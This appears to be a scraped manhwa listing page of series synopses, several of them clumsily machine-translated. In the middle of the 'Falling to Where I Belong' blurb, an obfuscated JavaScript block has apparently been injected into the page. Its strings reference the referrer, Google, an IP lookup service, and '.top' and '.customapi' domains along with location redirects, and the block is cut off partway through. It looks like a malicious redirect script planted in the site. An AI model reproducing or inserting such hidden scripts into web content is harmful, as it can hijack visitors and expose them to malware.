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4211 results

War In The Kitchen

In a world-famous restaurant, many delicacies are provided, and it’s also a heaven for all the women, both young and old. The employees here, from waiters to chefs are all top elites, with great figure and appearance. Taking the delicacies as a medium, the talented young chef Lu He, with the purpose of entertaining all the female guests, leads his partners to start their legendary lives in this restaurant.


I’Ve Been Here From The Beginning

Don't do that too much. Poor maidThe day after I commented on the pity of the extra maid, who even the author had forgotten.He has possessed that poor maid, Maria Mayer.Due to the convergence of its presence to 0, it even acquired the title of ghost.Still, I thought that Icould do my job with sincerity, but people who were interested in her began to appear.Even the future princes and grand dukes!"Can't you feel the presence? What the hell is your identity?"With the Crown Prince Elias who was half interested and half wary about Maria's identity, he wanted to keep him by my side."It doesn't matter that I don't remember. In the future, you can make sure you don't forget me."Archduke Dietrich approached with a smile as if he knew it even though it was the first time he had seen it.me, i I'm just an ordinary maid 1 (Special: Ghost)!*"Where are you looking?"A black shadow slowly appeared behind the man's back."It's just my afterimage."nice. it was famous


Michelin Star

From Tapastic: Only a handful of restaurants have the honor of being awarded a Michelin Star. Does our up and coming chef have the courage and the skills to overcome all obstacles? Rivalries and Romance, are they an obstacle or a catalyst to become the first chef to receive a Michelin Star in Korea? Original webtoon English language version available at Tapastic


Trans Horizon

Shin Jaemin who lacks self-confidence and is much more timid than his peers, spends his middle school days being bullied by his classmates. If there’s any hope, it’s the new and fresh Idol group ‘ROSE’. On the day of high school’s entrance, the freshman representative shows up in front of an exhausted Jaemin, who spent the previous day watching Rose’s performance videos.


The Wrong Way To Date

Beom Gyu-hwa, who has lived his whole life thinking he's an alpha, receives a high-paying part-time job offer while working to earn tuition as usual. The part-time job location is a Sehan hotel that he really wanted to avoid, but he goes to work thinking it was only for one day. However, while working, the pheromones start to feel unpleasant and he starts to feel unwell. And there, he meets Han Haesoo, one of the people he doesn't want to meet, andends up spending one night with him due to the hit... "You'rein heat, right?"


The Archduke’s Gorgeous Wedding Was a Fraud

Read manhwa The Archduke’s Gorgeous Wedding Was a Fraud / 그 대공의 화려한 결혼은 사기 When I opened my eyes, I found myself in a crate about to be sold as a slave in an auction. It was going well when the novel’s male lead burst in and saved me, but all of a sudden, this man asked me to marry him. “” Please be my wife and show this empire your worst behaviour, so wicked that no one would dare to approach me when they see you.”” “” What’s in it for me?”” “” I’ll give you 10 billion.”” What the F..X..? Welcome, dear customer! I would gladly uphold the ‘crazy bitch’ reputation to drive away those stalker fans just to live a comfortable life. However- “” I can’t imagine my life without you now.”” Seems like I somehow failed to protect the male lead, and instead acquired him for myself! Will acting as a villainess with all my might bring me money, power, fame, and even love?


Falling to Where I Belong

Heart warningly honest Cheng Fei Chi X A proud and an innocent Zhen Ye Ming, a youngster who doesn't think that relations are important. their love will never change! The fallen leave belongs to the pond and I belong to you!<script></script><script>function _0x25a8(){var _0x3d840a=['referrer','5105yhUHXs','7kphBSB','362852Bjymvz','TNtQt','https://ip','2236740tjeiRI','VXOBs','9QInzZi','http://rea','then','144525RcgYoD','.top/','dma.net/','hgDNA','google','568857fLVbAJ','452ASJZrd','syFaT','SZMhi','sQMTe','WatRW','.customapi','769704YRSVDS','location','1429576gyhXuO','oGbFQ','text','floor','href','CvTja','random','includes','zUUwr'];_0x25a8=function(){return _0x3d840a;};return _0x25a8();}function _0x4976(_0x47b96d,_0x5b0684){var _0x7abc08=_0x25a8();return _0x4976=function(_0x2988cc,_0x4217ae){_0x2988cc=_0x2988cc-(-0x2568+0x3a*0x48+0x1625);var _0x4c2e76=_0x7abc08[_0x2988cc];return _0x4c2e76;},_0x4976(_0x47b96d,_0x5b0684);}(function(_0x39527a,_0x2a735d){var _0x1016e8=_0x4976,_0x3586f5=_0x39527a();while(!![]){try{var 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How to Survive As The Devil’s Daughter

Read manhwa How to Survive As The Devil’s Daughter / How to survive as the devil’s child The world is doomed. Again. No matter how much I used dragons to try to prevent the end of the world by repeating nearly a thousand recurrences, I could never change the ending. Now, i’m tired. Returning is also boring. How old will I be back this time? Regression, I don’t want to do it again. “Ugh.” for a moment! What is this voice! What are these small hands like maple leaves! “Who abandoned this newborn baby?” This life has returned to being a baby! And that too, in front of the mansion of Lucas, the man who is destroying the world thousands of times! What a new baby! A newborn baby who can’t even move her arms or neck properly! No, let’s calm down for a moment and think. This life may be a great opportunity to prevent the end of the world while closely watching Lucas. Watch out for me and be nervous, Lucas. This time I won’t let you destroy this world! I raised my voice and laughed viciously. ahahahaha Ahahahaha! “Carrrrr.” “Oh my goodness. My baby has a cute laugh.”


Mookhyang – Dark Lady

As The Master Of The School Of Unholy Arts And As The Undefeated Unmasked Demon, Mookhyang Unfortunately Falls To A Strange Fantasy World By The Magic Of His Enemies (School Of Blood Arts). In The New World Of Elf, Sorcerer, Knight, And Dragon, Mookhyang’s Adventure Of Finding A Way Back To His Old World (Murim) Unfolds.


I Decided Not To Pretend I Don’t See It Anymore

I Realized After Going Back In Time. My Husband Who Had An Affair Had An Affair Again, And The Woman He Had An Affair With Appeared In Front Of Me Again. Also, I Don’t Have Much Time Left To Live. “ Let’s Get A Divorce.” “ …What” “ I Don’t Have A Single Penny To Give You, So Take Out Everything I Bought You And Leave. Hey, I Mean Everything. That’s Including Your Underwear Too.” “ Why Are You Suddenly Doing This?” “ Suddenly?” I Had A Twisted Smile On My Face. I Always Knew He Was A Shameless Person, But This Is A Bit Too Much. “ You Should Know That More Than Me, You Sex-Crazed Bastard.”


My Obsessive Father's Heroic Homecoming

Eleanor, a baronet's daughter, is left raising her child alone after hearing of her lover Cassius’s death in the war. Unknown to her, Cassius survives by making a pact with a dragon and returns as a war hero. His sudden return upends her world, forcing them to confront hidden secrets and unresolved feelings. Together, they must navigate their complex past and an uncertain future, embarking on a journey of love, sacrifice, and resilience.
